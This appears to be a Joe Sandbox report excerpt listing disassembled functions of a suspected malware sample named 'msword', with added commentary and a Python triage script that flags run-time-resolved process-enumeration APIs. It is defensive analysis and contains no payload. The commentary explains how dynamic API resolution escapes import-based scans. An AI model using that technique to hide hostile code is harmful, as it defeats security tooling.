                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance
                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                        • API String ID: 542301482-1377821865
                                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                        • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                        • API String ID: 20674999-2124804629
                                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
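The record above resolves its process-walking APIs at run time rather than importing them: LoadLibraryA("PSAPI.DLL") followed by GetProcAddress for EnumProcesses, EnumProcessModules and GetModuleBaseNameW, with the Toolhelp32 names (CreateToolhelp32Snapshot, Process32FirstW/NextW, Module32FirstW/NextW, Kernel32.DLL) kept in the function's string table as the fallback route. None of these names reach the import table, so an import-based scan misses them; the GetProcAddress arguments and the String ID line are where they surface. By contrast, the Delete: DeleteFile, RMDir: RemoveDirectory and CreateShortCut: out: format strings in the neighbouring records are the logging strings of the NSIS installer stub, so those functions are installer housekeeping rather than payload logic. The following Python is an added example and not part of the Joe Sandbox report or its IDA plugin: it parses one function record in the layout used on this page (bulleted `Module.API(args), ref: addr` lines, a `$`-separated String ID line) and flags the function when process-enumeration names are resolved dynamically or present as strings. The sample record is a constructed input copied from the API and String ID lines of the record above; the record layout is the only assumption taken from this page.

```python
import re
from typing import NamedTuple

# Constructed input in the layout of this report's per-function records:
# the API lines and the String ID line of the PSAPI record, copied from
# the visible report text. Added example, not Joe Sandbox code.
SAMPLE_RECORD = """\
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
• lstrlenW.KERNEL32(?), ref: 004063CC
• GetVersionExW.KERNEL32(?), ref: 0040642A
  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
• FreeLibrary.KERNEL32(00000000), ref: 004064D4
• GlobalFree.KERNEL32(?), ref: 004064DD
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
"""


class ApiCall(NamedTuple):
    api: str        # e.g. GetProcAddress
    module: str     # e.g. KERNEL32
    args: list      # argument list exactly as the report prints it
    ref: str        # address of the call site
    subcall: bool   # True when the report marks it "Part of subcall function"


# One API line: optional bullet, optional subcall prefix, Module.API(args), ref: addr.
# The greedy args group tolerates commas, quotes and parentheses inside arguments.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*?)\s*$")

# Names that, whether resolved at run time or merely present as strings, let a
# function walk the process list: the PSAPI route and the Toolhelp32 fallback.
PROCESS_ENUM_APIS = frozenset({
    "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
    "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
    "Module32FirstW", "Module32NextW",
})


def parse_api_calls(record):
    """Return every API line of a record as an ApiCall, in report order."""
    calls = []
    for line in record.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(), bool(m["sub"])))
    return calls


def parse_string_ids(record):
    """Split the $-separated String ID line; an empty line yields []."""
    for line in record.splitlines():
        m = STRING_ID_LINE.match(line)
        if m:
            return [s for s in m["ids"].split("$") if s]
    return []


def resolved_imports(calls):
    """Names passed as the second argument of GetProcAddress, in call order."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?"]


def loaded_libraries(calls):
    """Literal library names handed to LoadLibraryA/W (unknown '?' args skipped)."""
    return [c.args[0] for c in calls
            if c.api.startswith("LoadLibrary") and c.args and c.args[0] != "?"]


def flag_process_enumeration(record):
    """Triage one record: which process-enumeration names it reaches and how."""
    calls = parse_api_calls(record)
    resolved = resolved_imports(calls)
    strings = parse_string_ids(record)
    via_resolution = sorted(PROCESS_ENUM_APIS & set(resolved))
    via_strings = sorted(PROCESS_ENUM_APIS & set(strings))
    return {
        "loaded_libraries": loaded_libraries(calls),
        "resolved_imports": resolved,
        "process_enum_resolved": via_resolution,
        "process_enum_strings": via_strings,
        "suspicious": bool(via_resolution or via_strings),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(flag_process_enumeration(SAMPLE_RECORD), indent=2))
```

Run against the sample record the result lists PSAPI.DLL as the loaded library, the three GetProcAddress targets as resolved imports, and all eight enumeration names from the string table, so the record is flagged; a record such as the CreateFileW/ReadFile one earlier in this run produces no match. Feeding the tool every APIs block of a report and sorting by the flag is a quick way to find the handful of functions worth opening in the disassembler among the installer-stub records.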
                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                        • String ID: @%F$N$open
                                                                                        • API String ID: 3928313111-3849437375
                                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                        APIs
                                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                                        • API String ID: 565278875-1653569448
                                                                                        • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                        • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                        APIs
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                        • API String ID: 1641139501-220328614
                                                                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                        Strings
                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                        • API String ID: 3294113728-3145124454
                                                                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3734993849-2769509956
                                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
